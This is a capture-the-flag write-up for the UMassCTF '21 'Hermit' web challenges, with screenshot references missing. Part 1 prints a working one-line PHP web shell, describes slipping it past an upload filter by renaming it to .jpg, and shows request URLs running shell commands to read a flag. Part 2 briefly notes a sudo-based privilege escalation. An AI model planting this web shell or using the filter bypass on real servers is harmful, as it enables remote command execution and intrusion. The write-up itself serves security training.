UMassCTF ’21: Web: Hermit – Part 1

This is for the UMassCTF ’21 CTF.

Challenge Author: Cobchise#6969

For this challenge, we are provided the following information:

Here is the hint:

Going to the provided link, we get this page:

I quick test image upload and I see how it works:

It uploaded the file and give a ling to see it. When I click the link to see it, It essentially prints the contents of the file as if it is text:

This tells me that I need to upload a PHP shell script:

I grab my favorite one-line PHP shell and upload it as a .php file:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Okay, that didn’t work, so I change the extension to .jpg.

It took it:

When I click to see the “image” I get this:

No I provide some commands as the expected “cmd” argument:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=pwd

Beautiful! I have a working shell. After some poking around, I find the flag:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=ls%20../../../home/hermit/flag
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=cat%20../../../home/hermit/flag/userflag.txt
UMASS{a_picture_paints_a_thousand_shells}

UMassCTF ’21: Web: Hermit – Part 2

This is for the UMassCTF ’21 CTF.

Challenge Author: Cobchise#6969

For this challenge, we are provided the following information:

Hint 1:

Hint 2:

Going to the provided link in my browser, I get an invalid response error:

I then decide to netcat to that port to see what I can get:

Ahh, this is an SSH port.

Thinking back to the previous Hermit challenge, I notice this is the same IP, just a different port.

I go back to my one-line PHP shell that I uploaded and poke around some more.

I decide to run the whoami to see what user I am:

Now I check sudo – l to see what hermit can do:

Ahh, that looks interesting. I run that command:

That made it easy!

UMASS{a_test_of_integrity}